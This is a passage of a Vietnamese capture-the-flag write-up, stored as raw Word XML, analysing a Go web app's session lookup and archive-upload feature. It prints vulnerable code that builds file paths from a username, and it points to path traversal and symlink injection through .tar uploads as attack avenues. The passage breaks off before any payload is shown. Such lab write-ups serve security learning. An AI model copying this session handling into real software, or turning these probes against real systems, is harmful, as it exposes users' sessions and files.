              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> sessionID == </w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> || username == </w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6501A801" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> c.SendStatus(http.StatusUnauthorized)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B971E89" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F7B1E06" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B"/>
          <w:p w14:paraId="713BA51E" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:tab/>
              <w:t>session, err := GetSession(username)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="183A610B" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> err != nil {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12A9A144" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> c.SendStatus(http.StatusInternalServerError)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="109C5F02" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59F59722" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B"/>
          <w:p w14:paraId="3DB3D12A" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:tab/>
              <w:t>c.Locals(</w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"user"</w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:t>, *session)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="366BFB9F" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B"/>
          <w:p w14:paraId="67A0C18D" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> c.Next()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D2E204E" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E4FF3A2" w14:textId="0677B410" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="003D6F23">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t xml:space="preserve">Chức năng chung là truy xuất nội dung phiên bằng tên người dùng từ cookie. Tuy nhiên, đoạn </w:t>
      </w:r>
      <w:r w:rsidR="0010685A">
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t xml:space="preserve"> ở đây cũng có vấn đề; nó có thể truy xuất phiên của bất kỳ người dùng nào. Điều này có nghĩa là miễn là người dùng có quyền quản trị và biết tên người dùng, họ có thể truy cập /user/admin. Tuy nhiên, đối với câu hỏi này, không có người dùng nào như vậy.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706"/>
      </w:tblGrid>
      <w:tr w:rsidR="0010685A" w:rsidRPr="0010685A" w14:paraId="74AF976F" w14:textId="77777777" w:rsidTr="00ED4D9C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D232F95" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0010685A">
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E5659B" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7077DC86" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4153EC34" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B99538B" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5426CE5E" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FC7C1F0" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D681390" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CC3736B" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="712FD697" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53484F79" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="181DAF19" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45D31944" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E7D0E9C" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA64666" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BE774B9" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3975A37E" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="710DDAC8" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:t>func GetSession(username string) (*User, error) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B8F2BD5" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
              <w:t>sessionID, err := utils.RedisClient.Get(username)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E9169E9" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> err != nil {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B990030" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> nil, err</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27A904AF" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A257FD9" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
              <w:t>sessionJSON, err := os.ReadFile(filepath.Join(</w:t>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"/tmp/sessions"</w:t>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:t>, username, sessionID))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BA66C3E" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> err != nil {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A935A25" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> nil, err</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71F60C30" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="073E89F9" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
              <w:t>var session User</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="053FC4BE" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
              <w:t>err = json.Unmarshal(sessionJSON, &amp;session)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A6B51BC" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A"/>
          <w:p w14:paraId="022B99A7" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> err != nil {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DB254FD" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> nil, err</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D734608" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A525C66" w14:textId="77777777" w:rsidR="0010685A" w:rsidRPr="0010685A" w:rsidRDefault="0010685A" w:rsidP="0010685A">
            <w:r w:rsidRPr="0010685A">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="0010685A">
              <w:t xml:space="preserve"> &amp;session, nil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E55065D" w14:textId="77777777" w:rsidR="007710FD" w:rsidRDefault="007710FD" w:rsidP="0024207F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t>Trong GetSession, trước tiên nó sẽ truy vấn trường tên người dùng của cookie từ Redis. Nếu không có tên người dùng nào như vậy, nó sẽ trả về trực tiếp. Nếu truy vấn thành công, nó sẽ tìm phiên từ đó /tmp/sessions/{username}và trả về.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF545D9" w14:textId="5E2B212D" w:rsidR="002A7125" w:rsidRPr="007710FD" w:rsidRDefault="002A7125" w:rsidP="002A7125">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD780BD" w14:textId="77777777" w:rsidR="002C7C5F" w:rsidRPr="002C7C5F" w:rsidRDefault="002C7C5F" w:rsidP="002C7C5F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002C7C5F">
        <w:t>Để thuận tiện cho quá trình phân tích, mình tiến hành chạy ứng dụng thông qua Docker dựa trên mã nguồn được cung cấp. Sau khi build thành công, mình truy cập vào địa chỉ http://127.0.0.1:1337 để bắt đầu nghiên cứu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1972B38C" w14:textId="77777777" w:rsidR="002C7C5F" w:rsidRPr="002C7C5F" w:rsidRDefault="002C7C5F" w:rsidP="002C7C5F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002C7C5F">
        <w:t>Giao diện ban đầu hiển thị một trang đăng nhập đơn giản, bao gồm các trường nhập username và password. Không có thông báo lỗi hay chức năng đặc biệt nào được thể hiện rõ ràng ở bước này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02872677" w14:textId="1BD87E33" w:rsidR="0009508A" w:rsidRDefault="0060154B" w:rsidP="0024207F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0060154B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B6E2F3C" wp14:editId="0C39795D">
            <wp:extent cx="5731510" cy="3832860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="108660504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5048" name="Picture 1" descr="A screenshot of a login screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId6"/>
                    <a:srcRect t="10966" b="6710"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3832860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088ACA2" w14:textId="5B453250" w:rsidR="002C7C5F" w:rsidRDefault="002C7C5F" w:rsidP="0024207F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện đăng ký </w:t>
      </w:r>
      <w:r w:rsidR="000F3605">
        <w:t xml:space="preserve">tài khoản mới </w:t>
      </w:r>
      <w:r>
        <w:t>với tài khoản và mật khẩu là abcdef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C5B6E6" w14:textId="45A83D98" w:rsidR="00D2222B" w:rsidRDefault="00D2222B" w:rsidP="0024207F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D2222B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="624FCC4E" wp14:editId="34D8A61E">
            <wp:extent cx="5731510" cy="3831590"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="73870727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07274" name="Picture 1" descr="A screenshot of a login form&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId7"/>
                    <a:srcRect t="11134"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3831590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCF5318" w14:textId="77777777" w:rsidR="000763E6" w:rsidRPr="000763E6" w:rsidRDefault="000763E6" w:rsidP="000763E6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000763E6">
        <w:t>Sau khi đăng ký và đăng nhập thành công với tài khoản abcdef, ứng dụng tự động chuyển hướng tới đường dẫn /user/upload. Tại đây, giao diện hiển thị một form đơn giản cho phép người dùng upload một file archive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B386E6" w14:textId="77777777" w:rsidR="000763E6" w:rsidRPr="000763E6" w:rsidRDefault="000763E6" w:rsidP="000763E6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000763E6">
        <w:lastRenderedPageBreak/>
        <w:t>Giao diện bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4B14D3" w14:textId="77777777" w:rsidR="000763E6" w:rsidRPr="000763E6" w:rsidRDefault="000763E6" w:rsidP="000763E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000763E6">
        <w:t>Nút Choose File để chọn file .tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6AB273" w14:textId="77777777" w:rsidR="000763E6" w:rsidRPr="000763E6" w:rsidRDefault="000763E6" w:rsidP="000763E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000763E6">
        <w:t>Nút Upload để gửi file lên server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114CD0C7" w14:textId="77777777" w:rsidR="000763E6" w:rsidRPr="000763E6" w:rsidRDefault="000763E6" w:rsidP="000763E6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000763E6">
        <w:t xml:space="preserve">Điều này gợi ý rằng hệ thống có thể xử lý nội dung bên trong file nén — một điểm tiềm năng để kiểm tra các lỗ hổng liên quan đến </w:t>
      </w:r>
      <w:r w:rsidRPr="000763E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>path traversal</w:t>
      </w:r>
      <w:r w:rsidRPr="000763E6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="000763E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>symlink injection</w:t>
      </w:r>
      <w:r w:rsidRPr="000763E6">
        <w:t xml:space="preserve">, hoặc </w:t>
      </w:r>
      <w:r w:rsidRPr="000763E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ghi đè file nhạy cảm</w:t>
      </w:r>
      <w:r w:rsidRPr="000763E6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F75406" w14:textId="3BC2D128" w:rsidR="00C9651B" w:rsidRDefault="00C9651B" w:rsidP="0024207F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C9651B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BDECCF0" wp14:editId="475E384A">
            <wp:extent cx="5731510" cy="4264025"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="4504914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91403" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4264025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6825C325" w14:textId="5128A931" w:rsidR="00BC7FA2" w:rsidRPr="007710FD" w:rsidRDefault="007F14DB" w:rsidP="0024207F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007F14DB">
        <w:t xml:space="preserve">Để chuẩn bị một file đơn giản phục vụ cho quá trình kiểm thử chức năng upload, ta thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00BC7FA2">
        <w:t xml:space="preserve">tạo 1 file tên hello chứa nội dung test </w:t>
      </w:r>
      <w:r w:rsidR="00D92219">
        <w:t>và nén nó lại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6217BD43" w14:textId="6705CDA8" w:rsidR="0002152D" w:rsidRDefault="00F553CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64AF9D3E" wp14:editId="4348C511">
            <wp:extent cx="5731510" cy="1242060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2119932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32118" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="57717"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1242060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
